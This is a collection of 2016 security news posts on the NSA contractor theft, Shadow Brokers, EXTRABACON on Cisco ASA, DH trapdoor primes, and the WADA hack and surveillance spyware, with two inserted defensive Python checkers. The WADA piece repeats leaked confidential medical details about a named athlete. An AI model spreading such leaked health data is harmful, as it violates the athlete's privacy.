US contractor cyber heist

The volume of classified information stolen by the man could be far larger than Edward Snowden's cyber heist. The investigators discovered “six full bankers’ boxes” worth of documents, many of which were classified as “Secret” and “Top Secret.”

“The document appears to have been printed by the Defendant from an official government account,” read the court documents. “On the back of the document are handwritten notes describing the NSA’s classified computer infrastructure and detailed descriptions of classified technical operations.”

The New York Times reported that the stolen documents also included the NSA’s top secret hacking tools that were leaked online by the Shadow Brokers group, which claimed responsibility for the Equation Group hack.

According to the NY Times, the FBI has found forensic evidence that the hacking tools leaked online by the group had actually been on Martin’s computer.

Why did the US contractor steal the document?

It is still a mystery. People who know him describe him as patriotic, which suggests he would never have given classified information to another country. He never had a specific interest in politics, and the FBI does not rule out that he might have sold the precious information for money.

“His annual salary in recent years has exceeded $100,000 and he owns his house without a mortgage. But he has long bought expensive suits and Rolex watches, according to an old acquaintance, and a person familiar with his finances says he has struggled with debt. Court records show one past lien, an $8,997 state tax bill imposed in 2000 and not paid off until 2014.” reported the NYT.

Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing today in Baltimore.


Ex-NSA Contractor Stole 50 TB of Classified Data; Includes Top-Secret Hacking Tools
21.10.2016 thehackernews BigBrothers
Almost two months ago, the FBI quietly arrested NSA contractor Harold Thomas Martin III for stealing an enormous number of top secret documents from the intelligence agency.
Now, according to a court document filed Thursday, the FBI seized at least 50 terabytes of data from 51-year-old Martin that he siphoned from government computers over two decades.
The stolen data, at least 500 million pages of government records, includes top-secret information about "national defense." If all the data stolen by Martin is indeed found to be classified, it would be the largest NSA heist, far bigger than the Edward Snowden leaks.
According to the new filing, Martin also took "six full bankers’ boxes" worth of documents, many of which were marked "Secret" and "Top Secret." The stolen data also include the personal information of government employees. The stolen documents date from between 1996 through 2016.
"The document appears to have been printed by the Defendant from an official government account," the court documents read. "On the back of the document are handwritten notes describing the NSA's classified computer infrastructure and detailed descriptions of classified technical operations."
Former NSA Insider Could Be Behind The Shadow Brokers
It's not clear exactly what Martin allegedly stole, but The New York Times reported Wednesday that the stolen documents also included the NSA's top secret hacking tools posted online by a supposed hacking group, calling itself Shadow Brokers, earlier this year.
Earlier this summer, Shadow Brokers claimed to have infiltrated NSA servers and stolen enormous amounts of data, including working exploits and hacking tools.
The NY Times report suggests that the FBI has found forensic evidence that the hacking tools and cyber-weapons posted online by the alleged hacking group had actually been on a contractor's machine.
NSA Contractor to Face Espionage Charges
Martin, a former Booz Allen Hamilton staffer like NSA whistleblower Snowden, should remain locked up, and the government also plans to charge him with violations of the Espionage Act, prosecutors said.
If convicted, he could face the death penalty.
Martin has "obtained advanced educational degrees" and has also "taken extensive government training courses on computer security," including in the areas of encryption and secure communications.
A US Navy veteran, Martin allegedly used sophisticated software that "runs without being installed on a computer system and provides anonymous Internet access, leaving no digital footprint on the Machine."
It is believed that Martin was using the TAILS operating system or another USB-bootable operating system in conjunction with Tor or a VPN, which would not leave any forensic evidence of his computer activities.
Martin's motives are still unclear, but among the seized documents, investigators uncovered a letter sent to Martin's colleagues in 2007, in which he criticized the information security practices of government and refers to those same co-workers as "clowns."
The letter reads: "I will leave you with this: if you do not get obnoxious, obvious, and detrimental to my future, then I will not bring you; into the light, as it were. If you do, well, remember that you did it to yourselves."
Martin is due to appear before US Magistrate Judge Beth P. Gesner for his detention hearing on Friday in Baltimore.


Police Scan 117 Million Driving Licence Photos for Face Recognition Database
19.10.2016 thehackernews BigBrothers
Your driver's license photo could be scarier than it actually looks — Well, here's why:
With the help of state driver's license data, U.S. law enforcement agencies have created a huge face-recognition database of more than 117 Million American adults that is regularly scanned in the course of police investigations.
What's even worse? Most of the people scanned by police without their knowledge are law-abiding citizens.
According to a 150-page study published Tuesday by the Center for Privacy & Technology at the Georgetown University, ID photographs of more than 117 Million adult US citizens — that's about half of the US population — are now part of the "Perpetual Line-up," which can be searched using facial-recognition software.
In the past few years, facial recognition technology has improved enormously. Even big technology companies like Facebook have developed facial recognition software so powerful that it can identify you in photos even when your face is hidden.
So, why would law enforcement be left behind?
Currently, at least 26 states reportedly allow their law enforcement agencies to run face recognition searches against their driver's license databases, while dozens of local law enforcement agencies are using commercial software to scan images captured by ATM cameras and other surveillance devices.
This clearly indicates that millions of law-abiding American citizens are potentially being pulled into the dragnet, raising legal and privacy concerns about the use of this facial recognition software, the report explains.
The report calls the use of facial recognition systems "highly problematic" because of their potential to identify and monitor innocent citizens. Police departments usually keep fingerprint and DNA databases, but those are typically collected from criminals or people who have been arrested, not the general public.
"Innocent people don't belong in criminal databases," said Alvaro Bedoya, the co-author of the report. "By using face recognition to scan the faces on 26 states' driver's license and ID photos, police and the FBI have basically enrolled half of all adults in a massive virtual line-up. This has never been done for fingerprints or DNA. It's uncharted and frankly dangerous territory."
Another area of concern is that out of 52 agencies that use or have used face recognition, only one — Ohio's Bureau of Criminal Investigation — has a policy in place to prevent its officers from using the software to track religious, political or other free speech activities.
Accuracy is also a strong concern because facial recognition is far from perfect: one leading provider of face scanning tools says its reliability rating is only 95 percent.
Meanwhile, facial-recognition technology is reportedly less accurate when used to identify black people, women and those aged 18 to 30.
"An accurate algorithm correctly identifies a face in an ATM photo and leads police to a robber's door," the report suggests. "An inaccurate algorithm sends them to the wrong house — and could send an innocent person to jail."
The report also describes how the facial recognition technology is spreading rapidly and is almost entirely unregulated.
The findings argue the First Amendment is meant to protect "our right to express ourselves anonymously," and warn that police use of face recognition "to continuously identify anyone on the street—without individualized suspicion—could chill our basic freedoms of expression and association, particularly when face recognition is used at political protests."
In response to this report, over 50 civil liberties groups, including the American Civil Liberties Union (ACLU), delivered a letter to the Department of Justice's Civil Rights Division Tuesday asking it to investigate the expanding use of face recognition technology around the country by police.
Using facial recognition technology, "Police are free to identify and potentially track anyone even if they have no evidence that that person has done anything wrong," says ACLU's legislative counsel Neema Singh Guliani. "We do not expect that the police can identify us when we're walking into a mosque, attending an AA meeting, or when we are seeking help at a domestic violence shelter."
The unsupervised use of face recognition systems on a regular basis threatens the privacy and civil liberties of Millions, especially immigrants and people of color, according to the dozens of signatories.
For in-depth information, you can head on to the report [PDF], titled "The Perpetual Line-up: Unregulated Police Face Recognition in America."


Crack for Charity — GCHQ launches 'Puzzle Book' Challenge for Cryptographers
16.10.2016 thehackernews BigBrothers

The UK's Signals Intelligence and Cyber Security agency GCHQ has launched its first ever puzzle book, challenging researchers and cryptographers to crack codes for charity.
Dubbed "The GCHQ Puzzle Book," the book features more than 140 pages of codes, puzzles, and challenges created by expert code breakers at the British intelligence agency.
Ranging from easy to complex, the GCHQ challenges include ciphers and tests of numeracy and literacy, substitution codes, along with picture and music challenges.
Writing in the GCHQ Puzzle Book's introduction, GCHQ Director Robert Hannigan says:
"For nearly one hundred years, the men and women of GCHQ, both civilian and military, have been solving problems. They have done so in pursuit of our mission to keep the United Kingdom safe. GCHQ has a proud history of valuing and supporting individuals who think differently; without them, we would be of little value to the country. Not all are geniuses or brilliant mathematicians or famous names, but each is valued for his or her contribution to our mission."
The idea for the GCHQ Puzzle Book came after the success of last year's cryptographic puzzle challenge that was dubbed the 'hardest puzzle in the world' and featured in Hannigan's Christmas card.
Nearly 600,000 people from across the globe took part in the challenge; only 30,000 reached the final stage, but three people came very close and were considered winners by GCHQ.
However, the solution to the Christmas puzzle, including explanations from the puzzle-setters, was publicly made available early this year for anyone to have a look.
The GCHQ Puzzle Book, published by Penguin Random House, will be on sale from 20th October at High Street book retailers and online.
All GCHQ earnings from the book will be donated to Heads Together — the "campaign spearheaded by the Duke and Duchess of Cambridge and Prince Harry, to tackle stigma, raise awareness and provide vital help for people with mental health challenges."


Researchers Demonstrated How NSA Broke Trillions of Encrypted Connections
12.10.2016 thehackernews BigBrothers
In the year 2014, we came to know about the NSA's ability to break Trillions of encrypted connections by exploiting common implementations of the Diffie-Hellman key exchange algorithm – thanks to classified documents leaked by ex-NSA employee Edward Snowden.
At that time, computer scientists and senior cryptographers had presented the most plausible theory: a few prime numbers were shared by 92 percent of the top 1 Million Alexa HTTPS domains, and breaking those few primes might have fit well within the NSA's $11 Billion-per-year budget dedicated to "groundbreaking cryptanalytic capabilities."
And now, researchers from University of Pennsylvania, INRIA, CNRS and Université de Lorraine have practically proved how the NSA broke the most widespread encryption used on the Internet.
Diffie-Hellman key exchange (DHE) algorithm is a standard means of exchanging cryptographic keys over untrusted channels, which allows protocols such as HTTPS, SSH, VPN, SMTPS and IPsec to negotiate a secret key and create a secure connection.
Since applications that rely on the Diffie-Hellman key exchange algorithm generate ephemeral keys using groups built on large prime numbers, it would take hundreds or thousands of years and a nearly unimaginable amount of money to decrypt secure communications directly.
However, it took researchers just two months and as many as 3,000 CPUs to break one of the 1,024-bit keys that are used to secure communications on the Internet today, which could have allowed them to passively decrypt hundreds of millions of HTTPS-based communications and other Transport Layer Security (TLS) channels.
Encrypted communications could have an undetectable backdoor
You might be wondering how the researchers managed to do something which practically takes hundreds of years, with the computational hardware available today.
In a research paper [PDF] published Tuesday, the researchers explained that the Diffie-Hellman algorithm itself contains no backdoor, but that it can be weakened in an undetectable way by hiding how the prime numbers used by various applications were generated.
Additionally, the size of the keys used with the Diffie-Hellman algorithm (i.e. 1024 bits or less) also matters a lot.
The researchers created a weak 1024-bit Diffie-Hellman trapdoor function, i.e. a large prime that appears randomly chosen but is selected from a predefined family with hidden structure, and showed that solving the discrete logarithm problem that underpins its security is about 10,000 times easier.
"Current estimates for 1024-bit discrete log in general suggest that such computations are likely within range for an adversary who can afford hundreds of millions of dollars of special-purpose hardware," the researchers wrote in their paper.
So, advanced hackers or well-resourced agencies who know how the prime numbers for the trapdoor function were generated, and who want to decrypt 1024-bit secured communications, can compute the discrete logarithm and decrypt hundreds of millions of Diffie-Hellman-protected communications.
"The discrete logarithm computation for our backdoored prime was only feasible because of the 1024-bit size, and the most effective protection against any backdoor of this type has always been to use key sizes for which any computation is infeasible," the researchers said.
The researchers also estimate that a similar computation for 2048-bit keys, even with backdoored prime numbers, would be 16 million times harder than for 1024-bit keys and will remain infeasible for many years to come.
Despite the U.S. National Institute of Standards and Technology (NIST) recommending a transition to key sizes of at least 2,048 bits since 2010, the 1024-bit keys are still widely used online.
According to a survey performed by the SSL Pulse project, 22% of the Internet's top 140,000 HTTPS-protected sites use 1024-bit keys as of last month, which can be broken by nation-sponsored adversaries or intelligence agencies like NSA.
Therefore, the immediate solution to this issue is to switch to 2048-bit or even 4,096-bit keys, but, according to the researchers, in the future, all standardized prime numbers should be published together with their seeds.
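The two defences the article names, key sizes of at least 2048 bits and primes published together with their seeds, can both be checked mechanically. The following is an added example, not code from the paper: a prime is derived deterministically from a seed with SHA-256 so that anyone can regenerate it and confirm it was the first prime the seed produced, and a small audit function flags undersized moduli. The seed, the 256-bit demo size and the function names are assumptions for the demo.

```python
"""Verifiable Diffie-Hellman prime generation and a modulus size check.

Added example, not code from the paper: a prime is derived deterministically
from a published seed (SHA-256 in counter mode), so anyone can regenerate it
and confirm it was not hand-picked. A 256-bit size is used so the demo runs
in seconds; the logic does not depend on the size.
"""
import hashlib

# Bases for Miller-Rabin, also used for trial division. Deterministic for
# n < 3.3e24, probabilistic (negligible error) for the sizes used here.
_SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]


def is_probable_prime(n: int) -> bool:
    """Miller-Rabin primality test with fixed bases."""
    if n < 2:
        return False
    for p in _SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for a in _SMALL_PRIMES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def candidate_from_seed(seed: bytes, bits: int, counter: int) -> int:
    """Expand seed || counter into an odd `bits`-bit integer with the top bit set."""
    out = b""
    block = 0
    while len(out) * 8 < bits:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")
                              + block.to_bytes(4, "big")).digest()
        block += 1
    x = int.from_bytes(out, "big") >> (len(out) * 8 - bits)
    return x | (1 << (bits - 1)) | 1


def prime_from_seed(seed: bytes, bits: int, max_tries: int = 100_000) -> tuple[int, int]:
    """Return (prime, counter): the first counter whose candidate is prime."""
    for counter in range(max_tries):
        x = candidate_from_seed(seed, bits, counter)
        if is_probable_prime(x):
            return x, counter
    raise ValueError("no prime found within max_tries; choose another seed")


def verify_published_prime(seed: bytes, bits: int, p: int, counter: int) -> bool:
    """Regenerate from the published seed. The prime must be the FIRST hit,
    which denies the publisher the freedom to search for a trapdoored one."""
    try:
        return prime_from_seed(seed, bits) == (p, counter)
    except ValueError:
        return False


def audit_dh_modulus(p: int, min_bits: int = 2048) -> list[str]:
    """Findings a defender would act on; the 2048-bit floor follows NIST."""
    findings = []
    if p.bit_length() < min_bits:
        findings.append(f"{p.bit_length()}-bit modulus is below the {min_bits}-bit minimum")
    if not is_probable_prime(p):
        findings.append("modulus is not prime")
    return findings


if __name__ == "__main__":
    seed = b"constructed demo seed"  # a standard would publish this alongside p
    p, counter = prime_from_seed(seed, 256)
    print(f"p (counter {counter}) = {p:#x}")
    print("verifies:", verify_published_prime(seed, 256, p, counter))
    print("findings:", audit_dh_modulus(p))
```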
The concept of backdooring the primes used in the Diffie-Hellman key exchange is similar to the backdoor discovered in the Dual Elliptic Curve Deterministic Random Bit Generator, better known as Dual_EC_DRBG, which is also believed to have been introduced by the NSA.
Almost three years ago, the Snowden leaks revealed that RSA received a $10 Million bribe from the NSA to implement its flawed cryptographic algorithm Dual_EC_DRBG as the default in its BSAFE security toolkit, in order to keep encryption weak.
So, it would not be at all surprising if the NSA were using these undetectable, weakened "trapdoors" in millions of cryptographic keys to decrypt encrypted traffic over the Internet.


Leaked NSA Hacking Tools Were 'Mistakenly' Left By An Agent On A Remote Server
23.9.2016 thehackernews BigBrothers
NSA's private zero-day exploits, malware and hacking tools
If you are a hacker, you might have enjoyed the NSA's private zero-day exploits, malware and hacking tools that were leaked last month.
But the question is: how did these hacking tools end up in the hands of hackers?
It has been found that the NSA itself was not directly hacked; rather, a former NSA employee carelessly left those hacking tools on a remote server three years ago after an operation, and a group of Russian hackers found them, sources close to the investigation told Reuters.
The leaked hacking tools, which enable hackers to exploit vulnerabilities in systems from big vendors like Cisco Systems, Juniper, and Fortinet, were dumped publicly online by the group calling itself "The Shadow Brokers."
NSA officials have also admitted to the FBI that the careless employee acknowledged the error shortly afterward, so the agency has been aware of its operative's mistake for the last three years.
But instead of warning the affected companies that their customers were at risk, the NSA kept silent.
"After the discovery, the NSA tuned its sensors to detect [the] use of any of the tools by other parties, especially foreign adversaries with strong cyber espionage operations, such as China and Russia," Reuters reports.
Well, that's bullshit, if they call that a 'tactic.'
Shortly after the public release of the NSA cyber weapons, firewall vendors Cisco and Fortinet confirmed that the leaked zero-day vulnerabilities were legitimate and issued patches for them.
We are still waiting for the comments from the NSA, the FBI and the Office of the Director of National Intelligence about the matter.
Since the initial leak of the NSA's hacking tools last month, and the confirmation by Cisco and Fortinet that the leaked vulnerabilities were legitimate, the intelligence agency and the online community have been identifying working exploits in the data dump for vulnerabilities that are still unknown and being used in the wild.
Just recently, Cisco disclosed a new zero-day vulnerability from the leaked data dump that had been used by hackers to target some of its customers, which indicates that hackers will likely continue to take advantage of the now-exposed exploits to conduct cyber attacks.


Sports doping agency WADA confirms attack by Russian cyber spies
14.9.2016 securityaffairs BigBrothers

World Anti-Doping Agency (WADA) confirms that Russian hackers breached its Anti-Doping Administration and Management System (ADAMS) database.
Hackers breached the World Anti-Doping Agency (WADA) and stole Olympic athletes’ medical records; the agency has confirmed the hack. According to WADA, the hackers accessed the Anti-Doping Administration and Management System (ADAMS) database, and security experts speculate on the involvement of the “Russian cyber espionage group operator by the name of Tsar Team (APT28), also known as Fancy Bear.”

The hackers obtained access to the system by stealing credentials through a spear phishing attack against an “International Olympic Committee (IOC)-created account for the Rio 2016 Games.”

The hackers exploited the attention on the Olympic Games to trick their victims with a classic social engineering attack.

“The World Anti-Doping Agency (WADA) confirms that a Russian cyber espionage group operator by the name of Tsar Team (APT28), also known as Fancy Bear, illegally gained access to WADA’s Anti-Doping Administration and Management System (ADAMS) database via an International Olympic Committee (IOC)-created account for the Rio 2016 Games. The group accessed athlete data, including confidential medical data — such as Therapeutic Use Exemptions delivered by International Sports Federations (IFs) and National Anti-Doping Organizations (NADOs) — related to the Rio Games; and, subsequently released some of the data in the public domain, accompanied by the threat that they will release more.” reads the statement issued by the WADA that regrets the cyber attack.

WADA (@wada_ama) on Twitter, 13 September 2016: “WADA Confirms Attack by Russian Cyber Espionage Group: http://ow.ly/gYik304aJxX”
The hackers have released files claiming that top US athletes were authorized by WADA to take performance-enhancing substances; WADA, the athletes and the sports federations have denied the allegation, and the federations and athletes themselves have gone public to deny any wrongdoing.

Fancy Bear published the announcement of the data breach and the related files on a website bearing their name. (Be careful before visiting the site: Fancy Bear is one of the most dangerous APT groups and has leveraged zero-day exploits in several attacks.) Below is the message the group published on the site, which also included the athletes' medical records.

“Greetings citizens of the world. Allow us to introduce ourselves… We are Fancy Bears’ international hack team. We stand for fair play and clean sport.

We announce the start of #OpOlympics. We are going to tell you how Olympic medals are won. We hacked World Anti-Doping Agency databases and we were shocked with what we saw.”

“We will start with the U.S. team which has disgraced its name by tainted victories. We will also disclose exclusive information about other national Olympic teams later. Wait for sensational proof of famous athletes taking doping substances any time soon.”

Serena Williams, for example, was allowed to take oxycodone, hydromorphone, prednisone and methylprednisolone in 2010, 2014 and 2015, even though the substances are banned by WADA.

According to RT.com, Williams was also allowed to take some other drugs by Dr. Stuart Miller of the International Tennis Federation (ITF).

The WADA director general Olivier Niggli confirmed the involvement of Russian hackers in the statement issued by the agency.

“WADA condemns these ongoing cyber-attacks that are being carried out in an attempt to undermine WADA and the global anti-doping system,” said Niggli. “WADA has been informed by law enforcement authorities that these attacks are originating out of Russia,” he continued. “Let it be known that these criminal acts are greatly compromising the effort by the global anti-doping community to re-establish trust in Russia further to the outcomes of the Agency’s independent McLaren Investigation Report,” Niggli continued.

According to the experts, the hackers hit WADA in response to accusations of government-sponsored doping in Russian athletics; some Russian athletes were even banned from the Olympic Games this summer.

Stay Tuned …


Motherboard shows us how surveillance software works
13.9.2016 securityaffairs BigBrothers

Surveillance is a profitable business. Motherboard has published a never-before-seen 10-minute video showing a live demo of surveillance software.
Recently, the iPhone hack carried out with the NSO Group‘s Pegasus reignited the debate about the use of surveillance software. Who uses it? How? Are we able to defend our machines from such invasive surveillance?

NSO Group is just one company in a profitable market. To get an idea of its size, take a look at the Transparency Toolkit, a project that gathers open data on surveillance and human rights abuses and makes free software to examine it. The project's official page includes tools and case studies.

Hacking Team, Gamma International, NSO Group, Blue Coat, and Verint are only the first surveillance firms that come to mind as I write this post, but the list is very long.

These firms design solutions that are used by law enforcement and intelligence agencies during their investigations. The expensive solutions offered by surveillance firms allow their customers to spy on computers and smartphones; unfortunately, abuse in the wild is very common. Many governments have used them in the past to track dissidents and opposition figures, and in many cases the use of surveillance solutions represented a severe violation of human rights.

Although we can read thousands of good posts on the topic, it isn't easy to see a live demo of a surveillance system, but the well-known journalist Lorenzo Bicchierai has published an interesting post on Motherboard that shows how government spyware infects a computer.

“Motherboard has obtained a never-before-seen 10-minute video showing a live demo for a spyware solution made by a little known Italian surveillance contractor called RCS Lab. Unlike Hacking Team, RCS Lab has been able to fly under the radar for years, and very little is known about its products, or its customers.” wrote Bicchierai.

Motherboard published a video of a live demo presented by an expert from the Italian surveillance firm RCS Lab. The video shows how the company's spyware, Mito3, could be used to spy on an unsuspecting suspect.

“Mito3 allows customers to listen in on the target, intercept voice calls, text messages, video calls, social media activities, and chats, apparently both on computer and mobile platforms. It also allows police to track the target and geo-locate it thanks to the GPS. It even offers automatic transcription of the recordings” reads a confidential brochure obtained by Motherboard.

RCS Lab’s spyware Mito3 allows attackers to launch man-in-the-middle (MiTM) attacks against the victims, injecting malicious content into the connection to any website the victim intends to visit. The software is very easy to use, as explained in the post.

“An agent can choose whatever site he or she wants to use as a vector, click on a dropdown menu and select “inject HTML” to force the malicious popup to appear, according to the video,” reported Motherboard.

In the video, the RCS employee chooses the mirc.com website (an IRC chat client) as the attack vector and injects malware into it in order to compromise the target machine. When the victim visits mirc.com, a fake Adobe Flash update installer pops up, created by the surveillance software through the injected malicious code. The user is urged to click install in order to continue browsing the website, allowing the spyware to infect his machine.

I wish to thank Motherboard and Lorenzo Bicchierai for their post that gives us more information on surveillance practices.


NSA EXTRABACON exploit still threatens tens of thousands of CISCO ASA boxes
6.9.2016 securityaffairs BigBrothers

Two security experts from the Rapid 7 firm revealed that tens of thousands of CISCO ASA boxes are still vulnerable to the NSA EXTRABACON exploit.
A few weeks ago the Shadow Brokers hacker group hacked into the arsenal of the NSA-linked Equation Group and leaked online data dumps containing its exploits.

ExtraBacon is one of the exploits included in the NSA arsenal; in August security experts improved it to hack newer versions of the CISCO ASA appliance. The Hungary-based security consultancy SilentSignal focused its analysis on the ExtraBacon exploit, revealing that it could be used against newer models of Cisco’s Adaptive Security Appliance (ASA).

The security firm has demonstrated that the NSA-linked Cisco exploit dubbed ExtraBacon poses a bigger threat than previously thought.
Initially, the ExtraBacon exploit was restricted to versions 8.4.(4) and earlier of the CISCO ASA boxes and has now been expanded to 9.2.(4).

The EXTRABACON tool exploits the CVE-2016-6366 vulnerability, allowing an attacker who has already gained a foothold in a targeted network to take full control of a CISCO ASA firewall. The tool leverages a flaw in the Simple Network Management Protocol (SNMP) implementation of the ASA software.

“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.

“The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.”

At the end of August CISCO started releasing patches for its ASA software to address the Equation Group’s EXTRABACON exploit included in the NSA data dump leaked online.

Network administrators that manage CISCO ASA 7.2, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6 and 8.7 have to update their installations to version 9.1.7(9) or later. The vulnerability has been fixed in the ASA 9.1, 9.5 and 9.6 with the release of versions 9.1.7(9), 9.5(3) and 9.6.1(11).

Experts estimated that tens of thousands of Cisco ASA firewalls are vulnerable to an authentication bypass exploit.

The bad news

Unfortunately, two security experts from the Rapid 7 firm, Derek Abdine and Bob Rudis, revealed that tens of thousands of ASA appliances are still vulnerable to the EXTRABACON attack, judging by the time of their last reboot.

The duo scanned roughly 50,000 ASA devices that had been identified in a previous reconnaissance and analysed their last reboot times.

Some 10,000 of the 38,000 ASA boxes had rebooted within the 15 days since Cisco released its patch, which confirms that roughly 28,000 devices are still vulnerable because they were not patched. The remaining 12,000 devices did not provide last-reboot information.

Digging deeper into the analysis, the researchers discovered that unpatched devices belong to four large US firms, a UK government agency, a financial services company, and a large Japanese telecommunications provider.

What does it mean?

It means that the above organizations are running vulnerable CISCO ASA boxes that can be attacked if the following conditions are met:

the ASA device must have SNMP enabled, and an attacker must be able to reach the device via SNMP over UDP (yes, SNMP can also run over TCP, though it is rare to see it working that way) and know the SNMP community string;
the attacker must also have telnet or SSH access to the device.
Of course, exploiting ExtraBacon is not that simple; nonetheless, it is feasible for persistent attackers.

“This generally makes the EXTRABACON attack something that would occur within an organization’s network, specifically from a network segment that has SNMP and telnet/SSH access to a vulnerable device. So, the world is not ending, the internet is not broken and even if an attacker had the necessary access, they are just as likely to crash a Cisco ASA device as they are to gain command-line access to one by using the exploit.” wrote Abdine and Rudis.

“Even though there’s a high probable loss magnitude from a successful exploit, the threat capability and threat event frequency for attacks would most likely be low in the vast majority of organisations that use these devices to secure their environments.”

“Having said that, Extra Bacon is a pretty critical vulnerability in a core network security infrastructure device and Cisco patches are generally quick and safe to deploy, so it would be prudent for most organisations to deploy the patch as soon as they can obtain and test it.”

The security duo is warning the above organisations, which should not underestimate the risk of exposure to EXTRABACON attacks.
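The fixed releases and the exploit preconditions listed above can be turned into an inventory check. The following is an added example, not code from Cisco or Rapid7: it encodes only the fixed releases and legacy trains the article names, classifies a device's version as patched, vulnerable or unknown, and combines that with the exposure conditions (SNMP reachable with a known community string, plus telnet/SSH access). The inventory rows, the reachability flags and the function names are assumptions for the demo; trains the article does not mention are reported as unknown rather than guessed.

```python
"""Patch-status check for the EXTRABACON (CVE-2016-6366) fixed releases.

Added example, not code from Cisco or Rapid7. It encodes only the fixed
releases the article lists and the exploit preconditions it describes,
and flags devices that need attention. Version strings are written the
way the article writes them, e.g. "9.1.7(9)".
"""
import re

# From the article: the first fixed release per train.
FIXED_RELEASES = {
    (9, 1): "9.1.7(9)",
    (9, 5): "9.5(3)",
    (9, 6): "9.6.1(11)",
}
# From the article: trains with no fix of their own; operators must move to
# 9.1.7(9) or later.
LEGACY_TRAINS = {(7, 2), (8, 0), (8, 1), (8, 2), (8, 3), (8, 4), (8, 5), (8, 6), (8, 7)}
UPGRADE_TARGET = "9.1.7(9)"


def version_key(version: str) -> tuple:
    """Turn "9.1.7(9)" or "9.5(3)" into a comparable tuple padded to 4 numbers."""
    nums = [int(n) for n in re.findall(r"\d+", version)]
    if len(nums) < 2 or len(nums) > 4:
        raise ValueError(f"unrecognised ASA version: {version!r}")
    return tuple(nums + [0] * (4 - len(nums)))


def patch_status(version: str) -> str:
    """'patched', 'vulnerable', or 'unknown' (train not covered by the article)."""
    key = version_key(version)
    train = key[:2]
    if train in FIXED_RELEASES:
        return "patched" if key >= version_key(FIXED_RELEASES[train]) else "vulnerable"
    if train in LEGACY_TRAINS:
        return "vulnerable"
    return "unknown"


def assess_device(name: str, version: str, snmp_enabled: bool,
                  snmp_reachable_from_untrusted: bool,
                  mgmt_reachable_from_untrusted: bool) -> dict:
    """Combine patch status with the exposure conditions the article lists.
    The reachability flags are assumptions the operator supplies from their
    own network knowledge (SNMP over UDP plus telnet/SSH access)."""
    status = patch_status(version)
    exploit_path = snmp_enabled and snmp_reachable_from_untrusted and mgmt_reachable_from_untrusted
    if status == "vulnerable":
        target = FIXED_RELEASES.get(version_key(version)[:2], UPGRADE_TARGET)
        action = f"upgrade to {target} or later"
    elif status == "unknown":
        action = "check the Cisco advisory for this train"
    else:
        action = "none"
    return {"device": name, "version": version, "status": status,
            "exposed": status != "patched" and exploit_path, "action": action}


if __name__ == "__main__":
    # Constructed inventory, not data from the Rapid7 scan.
    inventory = [
        ("edge-fw-1", "9.1.7(9)", True, False, False),
        ("edge-fw-2", "9.1.6(4)", True, True, True),
        ("dc-fw-1", "8.4(4)", True, True, False),
        ("lab-fw", "9.2(4)", True, True, True),
    ]
    for row in inventory:
        print(assess_device(*row))
```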


NSO Group, the surveillance firm that could spy on every smartphone
6.9.2016 securityaffairs BigBrothers

The NSO Group is one of the surveillance companies that allow their clients to spy on their targets through almost any smartphone.
It is quite easy for any government to spy on mobile users; recently we discussed the Trident vulnerabilities that were exploited by surveillance software developed by the NSO Group to deliver the Pegasus malware.

But using the NSO Group’s software can be very expensive: according to The New York Times, spying on 10 iPhones costs $650,000, plus a $500,000 setup fee.

“To spy on 10 iPhone users, NSO charges government agencies $650,000; $650,000 for 10 Android users; $500,000 for five BlackBerry users; or $300,000 for five Symbian users — on top of the setup fee, according to one commercial proposal.” reported The New York Times. “You can pay for more targets. One hundred additional targets will cost $800,000, 50 extra targets cost $500,000, 20 extra will cost $250,000 and 10 extra costs $150,000, according to an NSO Group commercial proposal. There is an annual system maintenance fee of 17 percent of the total price every year thereafter.”

Several companies develop surveillance platforms targeting mobile devices. The NSO Group operated in the dark for several years, until researchers from the Citizen Lab and the Lookout firm spotted its software in targeted attacks against the UAE human rights defender Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who had reported a story about corruption in the Mexican government.

“The company’s internal documents detail pitches to countries throughout Europe and multimillion-dollar contracts with Mexico, which paid the NSO Group more than $15 million for three projects over three years, according to internal NSO Group emails dated in 2013.” added The New York Times.

“Our intelligence systems are subject to Mexico’s relevant legislation and have legal authorization,” Ricardo Alday, a spokesman for the Mexican embassy in Washington, said in an emailed statement. “They are not used against journalists or activists. All contracts with the federal government are done in accordance with the law.”

The New York Times has conducted further investigations into the NSO Group, a company that specializes in surveillance applications for governments and law enforcement agencies around the world.

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors sales and potential customers, verifying that the software will not be abused to violate human rights.

Officially, the sale of surveillance software is limited to authorized governments, to support agencies’ investigations of criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

“There’s no check on this,” said Bill Marczak, a senior fellow at the Citizen Lab at the University of Toronto’s Munk School of Global Affairs. “Once NSO’s systems are sold, governments can essentially use them however they want. NSO can say they’re trying to make the world a safer place, but they are also making the world a more surveilled place.”

Companies like the NSO Group operate in the dark, in a sort of “legal gray area”; although the Israeli government exercises strict control over the export of this kind of software, surveillance applications could be abused by threat actors and authoritarian regimes worldwide.

The NSO Group’s principal product is a surveillance software called Pegasus, which can spy on the most common mobile devices, including iPhones, Androids, BlackBerry and Symbian systems.

Pegasus is a perfect surveillance tool: it can steal any kind of data from smartphones and use them to spy on the surrounding environment through the camera and microphone.

“In its commercial proposals, the NSO Group asserts that its tracking software and hardware can install itself in any number of ways, including “over the air stealth installation,” tailored text messages and emails, through public Wi-Fi hot spots rigged to secretly install NSO Group software, or the old-fashioned way, by spies in person.” continues The New York Times.

Now we have more information about the mysterious NSO Group, but many other companies operate in the same “legal gray area.”


Azerbaijani Anti-Armenia Team of hacktivists leaked Armenian security service data

3.9.2016 securityaffairs BigBrothers

